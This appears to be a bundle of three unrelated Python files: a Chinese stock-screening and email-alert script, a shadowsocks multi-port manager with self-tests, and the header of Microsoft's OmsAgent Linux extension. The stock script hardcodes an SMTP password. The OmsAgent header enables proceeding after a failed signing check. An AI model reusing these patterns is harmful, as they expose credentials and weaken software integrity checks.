for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy10)
elif index_2 == DataContext.strategy11:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy11)
elif index_2 == DataContext.strategy12:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy12)
elif index_2 == DataContext.strategy13:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy13)
elif index_2 == DataContext.strategy14:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy14)
'''
elif index_2 == DataContext.strategy6:
for row in value_2.itertuples(index=False):
assembleFunc(index_1, DataContext.strategy6)
'''
calcresult(DataContext.strategy100)
calcresult(DataContext.strategy101)
calcresult(DataContext.strategy102)
calcresult(DataContext.strategy103)
calcresult(DataContext.strategy104)
# result_c_s1 = calcresult(DataContext.strategy1)
# result_c_s2 = calcresult(DataContext.strategy2)
# result_c_s3 = calcresult(DataContext.strategy3)
result_c_s4 = calcresult(DataContext.strategy4)
result_c_s5 = calcresult(DataContext.strategy5)
result_c_s7 = calcresult(DataContext.strategy7)
result_c_s8 = calcresult(DataContext.strategy8)
result_c_s9 = calcresult(DataContext.strategy9)
result_c_s10 = calcresult(DataContext.strategy10)
result_c_s11 = calcresult(DataContext.strategy11)
result_c_s12 = calcresult(DataContext.strategy12)
result_c_s13 = calcresult(DataContext.strategy13)
result_c_s14 = calcresult(DataContext.strategy14)
# result_c_s6 = calcresult(DataContext.strategy6)
# result_c_s1_2 = result_c_s1.intersection(result_c_s2).union(result_c_s1.intersection(result_h_s2))
# result_h_s1_2 = result_h_s1.intersection(result_h_s2).union(result_h_s1.intersection(result_c_s2))
# for result_1_2 in result_c_s1_2:
# append_value(context.totalresult[DataContext.strategy1_2], result_1_2, CalcResult(keytime, True))
# logger.info("%d symbols found with strategy 1 and 2 at %s" % (len(result_c_s1_2), keytime))
# result_c_s1_4 = result_c_s1.intersection(result_c_s4).union(result_c_s1.intersection(result_h_s4))
# result_h_s1_4 = result_h_s1.intersection(result_h_s4).union(result_h_s1.intersection(result_c_s4))
# for result_1_4 in result_c_s1_4:
# append_value(context.totalresult[DataContext.strategy1_4], result_1_4, CalcResult(keytime, True))
# logger.info("%d symbols found with strategy 1 and 4 at %s" % (len(result_c_s1_4), keytime))
'''
ret = {keytime: {DataContext.strategy5: [result_c_s5, result_h_s5],
DataContext.strategy4: [result_c_s4, result_h_s4],
DataContext.strategy1_4: [result_c_s1_4, result_h_s1_4],
DataContext.strategy3: [result_c_s3, result_h_s3],
DataContext.strategy1_2: [result_c_s1_2, result_h_s1_2],
DataContext.strategy1: [result_c_s1, result_h_s1],
DataContext.strategy2: [result_c_s2, result_h_s2],
# DataContext.strategy6: [result_c_s6, result_h_s6]}}
'''
ret = {keytime: {DataContext.strategy14: [result_c_s14, result_h_s14],
DataContext.strategy13: [result_c_s13, result_h_s13],
DataContext.strategy12: [result_c_s12, result_h_s12],
DataContext.strategy11: [result_c_s11, result_h_s11],
DataContext.strategy8: [result_c_s8, result_h_s8],
DataContext.strategy10: [result_c_s10, result_h_s10],
DataContext.strategy9: [result_c_s9, result_h_s9],
DataContext.strategy7: [result_c_s7, result_h_s7],
DataContext.strategy5: [result_c_s5, result_h_s5],
DataContext.strategy4: [result_c_s4, result_h_s4]}}
return ret
def handleresultlocked(resultf, context: DataContext):
emailcontent = ""
emailcontent_em = ""
def sortout(result_t: list):
max_num = 5
result_ch = {}
email_c: str = ""
email_p: str = ""
none_sector = "无归属版块"
if DataContext.iscountryChina():
sectornames = sectors_CN
spotlightedsector = sectornames['000001']
print_order = [spotlightedsector]
else:
sectornames = sectors_US
spotlightedsector = sectornames['000001']
print_order = [spotlightedsector]
for symbol_c in result_t:
for index_s, value_s in context.sectors.items():
if (isinstance(value_s, list) and symbol_c in value_s) or symbol_c == value_s:
append_value(result_ch, sectornames[index_s], symbol_c)
break
else:
append_value(result_ch, none_sector, symbol_c)
for index_s in result_ch:
if index_s != none_sector and index_s != spotlightedsector:
print_order.append(index_s)
else:
print_order.append(none_sector)
for index_s_o in print_order:
if index_s_o not in result_ch:
continue
value_s_o = result_ch[index_s_o]
str2 = "%s:\r\n" % index_s_o
email_c += str2
file.write(str2)
if isinstance(value_s_o, list):
while len(value_s_o) > 0:
if len(value_s_o) > max_num:
list_tmp = []
for i in range(max_num):
list_tmp.append(value_s_o.pop())
str3 = " ".join(list_tmp)
str_p = " ".join(list_tmp)
else:
str3 = " ".join(value_s_o)
str_p = " ".join(value_s_o)
value_s_o.clear()
str3 += "\r\n"
str_p += "\r\n"
email_c += str3
email_p += str_p
file.write(str3)
else:
str3 = value_s_o + "\r\n"
str_p = value_s_o + "\r\n"
email_c += str3
email_p += str_p
file.write(str3)
return email_c, email_p
def output(criteria):
emailcontent_i = ""
emailcontent_em_i = ""
emailcontent_i += criteria
file.write(criteria)
str7 = "当前满足条件的股票代码:\r\n\r\n"
emailcontent_i += str7
file.write(str7)
result_hm, result_em = sortout(symbols_l[0])
emailcontent_i += result_hm
emailcontent_em_i += result_em
str8 = "\r\n\r\n"
emailcontent_i += str8
file.write(str8)
str9 = "今日历史上满足条件的股票代码:\r\n\r\n"
emailcontent_i += str9
file.write(str9)
result_hm, result_em = sortout(symbols_l[1])
emailcontent_i += result_hm
return emailcontent_i, emailcontent_em_i
# output format symbol
for time_result, result in resultf.items():
filename = "result_" + time_result.strftime("%Y%m%d_%H%M")
filename_em = "EM_" + filename
filepath = os.path.join(DataContext.dir_name, filename)
with open(filepath, 'w+') as file:
for strategy_t, symbols_l in result.items():
str101 = ""
if strategy_t == DataContext.strategy6:
str101 = "\r\n\r\n\r\n\r\n\r\n策略6 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 0. MACD指标在60分钟周期上当前向上且快线大于慢线\r\n"
str101 += " 0. 20均线指标在60分钟周期上当前向上\r\n"
str101 += " 0. EXPMA指标在60分钟周期上快线当前向上\r\n"
str101 += " 1. KD指标在30分钟周期上在最近10天内至少存在一个至少连续4个周期的纠缠\r\n"
str101 += " 2. KD指标在30分钟周期形成金叉\r\n\r\n"
elif strategy_t == DataContext.strategy14:
str101 = "\r\n\r\n\r\n\r\n\r\n策略14 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 1. 股价在60分钟周期上20均线指标之下\r\n"
str101 += " 2. KD指标在60分钟周期上在最近10天内至少存在一个至少连续4个周期的纠缠\r\n"
str101 += " 3. KD指标在30分钟周期形成金叉\r\n\r\n"
elif strategy_t == DataContext.strategy13:
str101 = "\r\n\r\n\r\n\r\n\r\n策略13 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 1. 股价在60分钟周期上20均线指标之下\r\n"
str101 += " 2. KD指标在60分钟周期上在最近10天内至少存在一个至少连续4个周期的纠缠\r\n"
str101 += " 3. KD指标在60分钟周期形成金叉\r\n\r\n"
elif strategy_t == DataContext.strategy12:
str101 = "\r\n\r\n\r\n\r\n\r\n策略12 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 1. 当前K线值大于前五天的kd金叉的交叉点的5%\r\n"
str101 += " 1. 当前收盘价比前五天内的最低价再低1%\r\n"
elif strategy_t == DataContext.strategy11:
str101 = "\r\n\r\n\r\n\r\n\r\n策略11 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 1. MACD指标在60分钟周期形成金叉\r\n"
str101 += " 2. KD指标在60分钟周期形成金叉\r\n"
elif strategy_t == DataContext.strategy10:
str101 = "\r\n\r\n\r\n\r\n\r\n策略10 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 1. EXPMA指标在60分钟周期形成金叉\r\n"
elif strategy_t == DataContext.strategy9:
str101 = "\r\n\r\n\r\n\r\n\r\n策略9 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 1. EXPMA指标在30分钟周期形成金叉\r\n"
elif strategy_t == DataContext.strategy8:
str101 = "\r\n\r\n\r\n\r\n\r\n策略8 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 1. EXPMA指标在日线周期形成金叉\r\n"
elif strategy_t == DataContext.strategy7:
str101 = "\r\n\r\n\r\n\r\n\r\n策略7 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 0. MACD指标在60分钟周期上快线当前向上\r\n"
str101 += " 0. 20均线指标在60分钟周期上当前向上\r\n"
str101 += " 0. EXPMA指标在60分钟周期上快线当前向上\r\n"
str101 += " 1. KD指标在60分钟周期上在最近10天内至少存在一个至少连续4个周期的纠缠\r\n"
str101 += " 2. KD指标在60分钟周期形成金叉\r\n\r\n"
elif strategy_t == DataContext.strategy5:
str101 = "\r\n\r\n\r\n\r\n\r\n策略5 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 0. MACD指标在60分钟周期上当前向上且快线大于慢线\r\n"
str101 += " 0. 20均线指标在60分钟周期上当前向上\r\n"
str101 += " 0. EXPMA指标在60分钟周期上快线当前向上\r\n"
str101 += " 1. KD指标在60分钟周期上在最近10天内至少存在一个至少连续4个周期的纠缠\r\n"
str101 += " 2. KD指标在60分钟周期形成金叉\r\n\r\n"
elif strategy_t == DataContext.strategy4:
str101 = "\r\n\r\n\r\n\r\n\r\n策略4 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 0. MACD指标在60分钟周期上当前向上且快线大于慢线\r\n"
str101 += " 0. 20均线指标在60分钟周期上当前向上\r\n"
str101 += " 0. EXPMA指标在60分钟周期上快线当前向上\r\n"
str101 += " 1. KD指标在60分钟周期至少持续纠缠4个周期\r\n"
str101 += " 2. KD指标在60分钟周期形成金叉\r\n\r\n"
elif strategy_t == DataContext.strategy3:
str101 = "\r\n\r\n\r\n\r\n\r\n策略3 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 0. MACD指标在60分钟周期上当前向上且快线大于慢线\r\n"
str101 += " 0. 20均线指标在60分钟周期上当前向上\r\n"
str101 += " 0. EXPMA指标在60分钟周期上快线当前向上\r\n"
str101 += " 1. KD指标在60分钟周期至少持续纠缠4个周期且小于30\r\n\r\n"
elif strategy_t == DataContext.strategy1:
str101 = "\r\n\r\n\r\n\r\n\r\n策略1 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 0. MACD指标在60分钟周期上当前向上且快线大于慢线\r\n"
str101 += " 0. 20均线指标在60分钟周期上当前向上\r\n"
str101 += " 0. EXPMA指标在60分钟周期上快线当前向上\r\n"
str101 += " 1. 收盘价在15分钟周期上穿70均线\r\n"
str101 += " 2. 成交量在15分钟周期大于80均线\r\n"
str101 += " 3. KD指标在30分钟周期形成金叉\r\n\r\n"
# str101 += " 4. OBV指标在30分钟周期大于零且大于30天均值\r\n\r\n"
elif strategy_t == DataContext.strategy2:
str101 = "\r\n\r\n\r\n\r\n\r\n策略2 - 预警条件为:\r\n"
str101 += " 0. 前五日价格振幅平均值大于等于3%\r\n"
str101 += " 0. MACD指标在60分钟周期上当前向上且快线大于慢线\r\n"
str101 += " 0. 20均线指标在60分钟周期上当前向上\r\n"
str101 += " 0. EXPMA指标在60分钟周期上快线当前向上\r\n"
str101 += " 1. 收盘价在60分钟周期不大于50\r\n"
str101 += " 2. KD指标在60分钟周期形成金叉且金叉小于30\r\n\r\n"
elif strategy_t == DataContext.strategy1_2:
str101 = "\r\n\r\n\r\n\r\n\r\n同时满足策略1和策略2的预警条件:\r\n\r\n"
elif strategy_t == DataContext.strategy1_4:
str101 = "\r\n\r\n\r\n\r\n\r\n同时满足策略1和策略4的预警条件:\r\n\r\n"
content_tmp, content_em_tmp = output(str101)
emailcontent += content_tmp
emailcontent_em += content_em_tmp
return filename, emailcontent, filename_em, emailcontent_em
def sendemail(email_subject: str, email_content: str, recipient: str):
msg = EmailMessage()
msg["From"] = DataContext.email_recipient
msg["To"] = recipient
msg["Subject"] = email_subject
msg.set_content(email_content)
try:
with smtplib.SMTP_SSL("smtp.sina.com", 465) as smtp:
smtp.login(DataContext.email_recipient, "f7556624333b77f3")
smtp.send_message(msg)
except Exception as ee:
logger.error("error >>>", ee)
traceback.print_exc()
else:
logger.info("Send %s an email %s successfully." % (recipient, email_subject))
def calconhistory(context: DataContext):
login_em()
loadsectors(context)
result = {datetime.datetime.now(): quantstrategies(context)}
handleresultlocked(mergeresult(context, result, ishistory=True), context)
logout_em()
def updatedatabaselocked(board: list, source: DataSource = DataSource.AK_SHARE):
retriedstocks = {}
loaddatainternal(board, 2, retried=retriedstocks, datasource=source)
reloaddata(retriedstocks)
logger.debug("Downloading data is done and thread id is {} and thread ident is {}".
format(threading.get_native_id(), threading.get_ident()))
def updatedatabase(is_auto=False, source: DataSource = DataSource.AK_SHARE, context: DataContext=None):
if is_auto:
timedelta = datetime.timedelta(minutes=10)
today = datetime.date.today()
time_download = datetime.datetime.combine(today, datetime.time(hour=16, minute=30))
while True:
if (datetime.datetime.now() - time_download) > timedelta:
break
else:
time.sleep(600)
if DataContext.iscountryChina():
if is_auto and source == DataSource.AK_SHARE:
loaddatainternal(DataContext.markets, 5, 5,
datasource=source, context=context)
return
if source == DataSource.EFINANCE:
updatedatabaselocked(DataContext.markets, source)
else:
global queue_history_data
reloaded_symbols = []
def execute_data_task():
queue_history_data.put((ProcessStatus.START, threading.get_ident()))
updatedatabaselocked(DataContext.markets, source)
queue_history_data.put((ProcessStatus.STOP, threading.get_ident()))
def execute_continue_data_task():
pass
def execute_watchdog_task():
last_board_symbol: tuple
timer: threading.Timer = None
def timer_func(thread_id: int):
if last_board_symbol is not None:
reloaded_symbols.append(last_board_symbol)
logger.debug("%s - %s needs to be reloaded." % last_board_symbol)
while True:
resultfromq = queue_history_data.get()
if isinstance(resultfromq, tuple) and len(resultfromq) == 2:
result_1 = resultfromq[0]
result_2 = resultfromq[1]
if isinstance(result_1, ProcessStatus) and result_1 == ProcessStatus.STOP \
and isinstance(result_2, int):
logger.debug("The thread {} of fetching data quited".format(result_2))
# stop timer
if timer is not None:
timer.cancel()
break
elif isinstance(result_1, ProcessStatus) and resultfromq[0] == ProcessStatus.START \
and isinstance(result_2, int):
logger.debug("The thread {} of fetching data was started".format(result_2))
# start timer
timer = threading.Timer(300, timer_func, (result_2,))
timer.start()
elif isinstance(result_1, tuple) and len(result_1) == 2 and isinstance(result_2,
threading.Event):
last_board_symbol = result_1
logger.debug("%s - %s has been downloaded." % last_board_symbol)
# restart timer
if timer is not None:
timer.cancel()
timer = threading.Timer(5, timer_func, (result_2,))
timer.start()
result_2.set()
def start_thread(target_func: list):
for tf in target_func:
thread = threading.Thread(target=tf)
thread.start()
threads.append(thread)
threads = []
'''
for market in DataContext.markets:
thread = threading.Thread(target=updatedatabaselocked, args=(market, source,))
thread.start()
threads.append(thread)
'''
# East Money was obsoleted.
# loaddata(DataContext.markets, 2, datasource=DataSource.EAST_MONEY, period=240, type_func=2, isloginAlready=True)
start_thread([execute_watchdog_task, execute_data_task])
for i in range(len(threads)):
threads[i].join()
if not is_auto and getdbconn():
getdbconn().cursor().close()
getdbconn().close()
logger.debug("PostgreSQL connection is closed")
if DataContext.iscountryUS():
loaddata(DataContext.markets, 2, datasource=DataSource.YAHOO)
def login_em(isforcelogin: bool=True):
def mainCallback(quantdata):
"""
mainCallback 是主回调函数,可捕捉如下错误
在start函数第三个参数位传入,该函数只有一个为c.EmQuantData类型的参数quantdata
:param quantdata:c.EmQuantData
:return:
"""
logger.debug("mainCallback", str(quantdata))
# 登录掉线或者 登陆数达到上线(即登录被踢下线) 这时所有的服务都会停止
if str(quantdata.ErrorCode) == "10001011" or str(quantdata.ErrorCode) == "10001009":
logger.error("Your account is disconnect. You can force login automatically here if you need.")
# 行情登录验证失败(每次连接行情服务器时需要登录验证)或者行情流量验证失败时,会取消所有订阅,用户需根据具体情况处理
elif str(quantdata.ErrorCode) == "10001021" or str(quantdata.ErrorCode) == "10001022":
logger.error("Your all csq subscribe have stopped.")
# 行情服务器断线自动重连连续6次失败(1分钟左右)不过重连尝试还会继续进行直到成功为止,遇到这种情况需要确认两边的网络状况
elif str(quantdata.ErrorCode) == "10002009":
logger.error("Your all csq subscribe have stopped, reconnect 6 times fail.")
# 行情订阅遇到一些错误(这些错误会导致重连,错误原因通过日志输出,统一转换成EQERR_QUOTE_RECONNECT在这里通知),正自动重连并重新订阅,可以做个监控
elif str(quantdata.ErrorCode) == "10002012":
logger.error("csq subscribe break on some error, reconnect and request automatically.")
# 资讯服务器断线自动重连连续6次失败(1分钟左右)不过重连尝试还会继续进行直到成功为止,遇到这种情况需要确认两边的网络状况
elif str(quantdata.ErrorCode) == "10002014":
logger.error("Your all cnq subscribe have stopped, reconnect 6 times fail.")
# 资讯订阅遇到一些错误(这些错误会导致重连,错误原因通过日志输出,统一转换成EQERR_INFO_RECONNECT在这里通知),正自动重连并重新订阅,可以做个监控
elif str(quantdata.ErrorCode) == "10002013":
logger.error("cnq subscribe break on some error, reconnect and request automatically.")
# 资讯登录验证失败(每次连接资讯服务器时需要登录验证)或者资讯流量验证失败时,会取消所有订阅,用户需根据具体情况处理
elif str(quantdata.ErrorCode) == "10001024" or str(quantdata.ErrorCode) == "10001025":
logger.error("Your all cnq subscribe have stopped.")
else:
pass
try:
# 调用登录函数(激活后使用,不需要用户名密码)
if isforcelogin:
loginparam = "TestLatency=1,ForceLogin=1"
else:
loginparam = "TestLatency=1"
loginResult = c.start(loginparam, '', mainCallback)
logger.debug(loginResult)
if loginResult.ErrorCode != 0:
logger.error("Choice quant -- login failed. ErrorCode is %d" % loginResult.ErrorCode)
login_em()
except Exception as ee:
logger.error("error >>>", ee)
logger.error("Choice quant -- login failed.")
traceback.print_exc()
login_em()
else:
logger.info("Choice quant -- login successful.")
def logout_em():
try:
logoutResult = c.stop()
logger.debug(logoutResult)
except Exception as ee:
logger.error("error >>>", ee)
logger.error("Choice quant -- logout failed")
traceback.print_exc()
else:
logger.info("Choice quant -- logout successful")
def pre_exec(country: CountryCode):
# EM has been obsoleted.
# login_em()
DataContext.initklz(country)
data_context = DataContext()
loadsectors(data_context)
return data_context
def post_exec(context: DataContext):
# EM has been obsoleted.
# updatedatabase(True, DataSource.EAST_MONEY)
# logout_em()
# FIXME: only for datasource AKShare
# updatedatabase(True, DataSource.SNAPSHOT, context)
updatedatabase(True, DataSource.EFINANCE)
if getdbconn():
getdbconn().cursor().close()
getdbconn().close()
logger.debug("PostgreSQL connection is closed")
def backtest(context: DataContext):
if DataContext.iscountryChina():
mins15 = 16
if DataContext.iscountryUS():
mins15 = 26
base = mins15 * 2
end_point = - mins15 - base
start_point = - 1 - base
results = {}
for stockdata in context.data15mins.values():
for key in stockdata.keys():
data = stockdata.get(key)
strategy_cross = CROSSUpMAAction(data)
valid, result_tmp = strategy_cross.executeaction(startindex=start_point, endindex=end_point,
cross_period=context.cross_sma_period,
greater_period=context.greater_than_sma_period)
if valid:
if len(result_tmp) > 0:
# it is needed to reverse result_tmp because start point is last item.
reversed_result = result_tmp.iloc[::-1]
for row in reversed_result.itertuples(index=False):
if row[7]:
close_price = row[2]
times = 1.05
slot = -1
for i in range(-(end_point+mins15)):
if data.iloc[slot-i]['high'] >= close_price * times:
ret_earning = True
break
else:
ret_earning = False
results[key] = ret_earning
break
else:
print("strategy_cross_70 is failed on {}".format(key))
print("符合条件的股票共计: %d" % len(results))
win_stocks = []
for index, value in results.items():
if value:
win_stocks.append(index)
if len(results) == 0:
return
print("盈利的股票占比: {}%".format(len(win_stocks)/len(results)*100))
print("盈利的股票是:")
print(" ".join(win_stocks))
'''
login_em()
loadsectors(context)
logout_em()
sector_selected = context.sectors.get(SectorUS.sector_201001, [])
print("中概股共计: %d" % len(sector_selected))
result_selected = {}
for index in results:
if (isinstance(sector_selected, list) and index in sector_selected) or index == sector_selected:
result_selected[index] = results[index]
print("中概股中符合条件的股票共计: %d" % len(result_selected))
win_stocks = []
for index, value in result_selected.items():
if value:
win_stocks.append(index)
if len(result_selected) == 0:
return
print("盈利的股票占比: {}%".format(len(win_stocks) / len(result_selected) * 100))
print("盈利的股票是:")
print(" ".join(win_stocks))
'''
if __name__ == '__main__':
# ["创业板", "中小企业板", "主板A股", "主板", "科创板"]
# DataContext.initklz(CountryCode.CHINA)
# loaddata(["主板A股"], 2, datasource=DataSource.AK_SHARE)
# loaddata(["主板A股"], 3, c_point=600216, datasource=DataSource.AK_SHARE)
# login_em(isforcelogin=False)
# loaddata(["科创板"], 2, datasource=DataSource.EAST_MONEY)
# loaddata(DataContext.markets, 2, datasource=DataSource.EAST_MONEY, period=240, type_func=2)
dcon = pre_exec(CountryCode.CHINA)
# dcon = pre_exec(CountryCode.US)
t = threading.Thread(target=handleresult, args=(dcon,))
t.start()
snapshot(dcon)
time.sleep(60)
post_exec(dcon)
'''
DataContext.initklz(CountryCode.CHINA)
# updatedatabase(source=DataSource.EFINANCE)
loaddata(["科创板"], 2, datasource=DataSource.EFINANCE)
'''
# DataContext.country = CountryCode.CHINA
# checksymbols()
# DataContext.initklz(CountryCode.CHINA)
# backtest(DataContext())
# calconhistory(DataContext())
# quantstrategies(DataContext())
# login_em(isforcelogin=False)
# logout_em()
# updatedatabase(source=DataSource.EAST_MONEY)
# loadsectorsfromEM()
# reloaddata({})
# DataContext.country = CountryCode.US
# loaddata(["NASDAQ", "NYSE", "AMEX"], 2, datasource=DataSource.YAHOO)
# loaddata(["NASDAQ"], 3, c_point='AMBA', datasource=DataSource.YAHOO)
|
manager.py
|
from __future__ import absolute_import, division, print_function, \
with_statement
import errno
import traceback
import socket
import logging
import json
import collections
from shadowsocks import common, eventloop, tcprelay, udprelay, asyncdns, shell
BUF_SIZE = 1506
STAT_SEND_LIMIT = 100
class Manager(object):
def __init__(self, config):
self._config = config
self._relays = {} # (tcprelay, udprelay)
self._loop = eventloop.EventLoop()
self._dns_resolver = asyncdns.DNSResolver()
self._dns_resolver.add_to_loop(self._loop)
self._statistics = collections.defaultdict(int)
self._control_client_addr = None
try:
manager_address = config['manager_address']
if ':' in manager_address:
addr = manager_address.rsplit(':', 1)
addr = addr[0], int(addr[1])
addrs = socket.getaddrinfo(addr[0], addr[1])
if addrs:
family = addrs[0][0]
else:
logging.error('invalid address: %s', manager_address)
exit(1)
else:
addr = manager_address
family = socket.AF_UNIX
self._control_socket = socket.socket(family,
socket.SOCK_DGRAM)
self._control_socket.bind(addr)
self._control_socket.setblocking(False)
except (OSError, IOError) as e:
logging.error(e)
logging.error('can not bind to manager address')
exit(1)
self._loop.add(self._control_socket,
eventloop.POLL_IN, self)
self._loop.add_periodic(self.handle_periodic)
port_password = config['port_password']
del config['port_password']
for port, password in port_password.items():
a_config = config.copy()
a_config['server_port'] = int(port)
a_config['password'] = password
self.add_port(a_config)
def add_port(self, config):
port = int(config['server_port'])
servers = self._relays.get(port, None)
if servers:
logging.error("server already exists at %s:%d" % (config['server'],
port))
return
logging.info("adding server at %s:%d" % (config['server'], port))
t = tcprelay.TCPRelay(config, self._dns_resolver, False,
self.stat_callback)
u = udprelay.UDPRelay(config, self._dns_resolver, False,
self.stat_callback)
t.add_to_loop(self._loop)
u.add_to_loop(self._loop)
self._relays[port] = (t, u)
def remove_port(self, config):
port = int(config['server_port'])
servers = self._relays.get(port, None)
if servers:
logging.info("removing server at %s:%d" % (config['server'], port))
t, u = servers
t.close(next_tick=False)
u.close(next_tick=False)
del self._relays[port]
else:
logging.error("server not exist at %s:%d" % (config['server'],
port))
def handle_event(self, sock, fd, event):
if sock == self._control_socket and event == eventloop.POLL_IN:
data, self._control_client_addr = sock.recvfrom(BUF_SIZE)
parsed = self._parse_command(data)
if parsed:
command, config = parsed
a_config = self._config.copy()
if config:
# let the command override the configuration file
a_config.update(config)
if 'server_port' not in a_config:
logging.error('can not find server_port in config')
else:
if command == 'add':
self.add_port(a_config)
self._send_control_data(b'ok')
elif command == 'remove':
self.remove_port(a_config)
self._send_control_data(b'ok')
elif command == 'ping':
self._send_control_data(b'pong')
else:
logging.error('unknown command %s', command)
def _parse_command(self, data):
# commands:
# add: {"server_port": 8000, "password": "foobar"}
# remove: {"server_port": 8000"}
data = common.to_str(data)
parts = data.split(':', 1)
if len(parts) < 2:
return data, None
command, config_json = parts
try:
config = shell.parse_json_in_str(config_json)
return command, config
except Exception as e:
logging.error(e)
return None
def stat_callback(self, port, data_len):
self._statistics[port] += data_len
def handle_periodic(self):
r = {}
i = 0
def send_data(data_dict):
if data_dict:
# use compact JSON format (without space)
data = common.to_bytes(json.dumps(data_dict,
separators=(',', ':')))
self._send_control_data(b'stat: ' + data)
for k, v in self._statistics.items():
r[k] = v
i += 1
# split the data into segments that fit in UDP packets
if i >= STAT_SEND_LIMIT:
send_data(r)
r.clear()
send_data(r)
self._statistics.clear()
def _send_control_data(self, data):
if self._control_client_addr:
try:
self._control_socket.sendto(data, self._control_client_addr)
except (socket.error, OSError, IOError) as e:
error_no = eventloop.errno_from_exception(e)
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
return
else:
shell.print_exception(e)
if self._config['verbose']:
traceback.print_exc()
def run(self):
self._loop.run()
def run(config):
Manager(config).run()
def test():
import time
import threading
import struct
from shadowsocks import encrypt
logging.basicConfig(level=5,
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
enc = []
eventloop.TIMEOUT_PRECISION = 1
def run_server():
config = {
'server': '127.0.0.1',
'local_port': 1081,
'port_password': {
'8381': 'foobar1',
'8382': 'foobar2'
},
'method': 'aes-256-cfb',
'manager_address': '127.0.0.1:6001',
'timeout': 60,
'fast_open': False,
'verbose': 2
}
manager = Manager(config)
enc.append(manager)
manager.run()
t = threading.Thread(target=run_server)
t.start()
time.sleep(1)
manager = enc[0]
cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
cli.connect(('127.0.0.1', 6001))
# test add and remove
time.sleep(1)
cli.send(b'add: {"server_port":7001, "password":"asdfadsfasdf"}')
time.sleep(1)
assert 7001 in manager._relays
data, addr = cli.recvfrom(1506)
assert b'ok' in data
cli.send(b'remove: {"server_port":8381}')
time.sleep(1)
assert 8381 not in manager._relays
data, addr = cli.recvfrom(1506)
assert b'ok' in data
logging.info('add and remove test passed')
# test statistics for TCP
header = common.pack_addr(b'google.com') + struct.pack('>H', 80)
data = encrypt.encrypt_all(b'asdfadsfasdf', 'aes-256-cfb', 1,
header + b'GET /\r\n\r\n')
tcp_cli = socket.socket()
tcp_cli.connect(('127.0.0.1', 7001))
tcp_cli.send(data)
tcp_cli.recv(4096)
tcp_cli.close()
data, addr = cli.recvfrom(1506)
data = common.to_str(data)
assert data.startswith('stat: ')
data = data.split('stat:')[1]
stats = shell.parse_json_in_str(data)
assert '7001' in stats
logging.info('TCP statistics test passed')
# test statistics for UDP
header = common.pack_addr(b'127.0.0.1') + struct.pack('>H', 80)
data = encrypt.encrypt_all(b'foobar2', 'aes-256-cfb', 1,
header + b'test')
udp_cli = socket.socket(type=socket.SOCK_DGRAM)
udp_cli.sendto(data, ('127.0.0.1', 8382))
tcp_cli.close()
data, addr = cli.recvfrom(1506)
data = common.to_str(data)
assert data.startswith('stat: ')
data = data.split('stat:')[1]
stats = json.loads(data)
assert '8382' in stats
logging.info('UDP statistics test passed')
manager._loop.stop()
t.join()
if __name__ == '__main__':
test()
|
omsagent.py
|
#!/usr/bin/env python
#
# OmsAgentForLinux Extension
#
# Copyright 2015 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import sys
# future imports have no effect on python 3 (verified in official docs)
# importing from source causes import errors on python 3, lets skip import
if sys.version_info[0] < 3:
from future import standard_library
standard_library.install_aliases()
from builtins import str
import os
import os.path
import signal
import pwd
import grp
import re
import traceback
import time
import platform
import subprocess
import json
import base64
import inspect
import urllib.request, urllib.parse, urllib.error
import watcherutil
import shutil
from threading import Thread
try:
from Utils.WAAgentUtil import waagent
import Utils.HandlerUtil as HUtil
except Exception as e:
# These utils have checks around the use of them; this is not an exit case
print('Importing utils failed with error: {0}'.format(e))
# This monkey patch duplicates the one made in the waagent import above.
# It is necessary because on 2.6, the waagent monkey patch appears to be overridden
# by the python-future subprocess.check_output backport.
if sys.version_info < (2,7):
def check_output(*popenargs, **kwargs):
r"""Backport from subprocess module from python 2.7"""
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
raise subprocess.CalledProcessError(retcode, cmd, output=output)
return output
# Exception classes used by this module.
class CalledProcessError(Exception):
def __init__(self, returncode, cmd, output=None):
self.returncode = returncode
self.cmd = cmd
self.output = output
def __str__(self):
return "Command '%s' returned non-zero exit status %d" % (self.cmd, self.returncode)
subprocess.check_output = check_output
subprocess.CalledProcessError = CalledProcessError
# Global Variables
ProceedOnSigningVerificationFailure = True
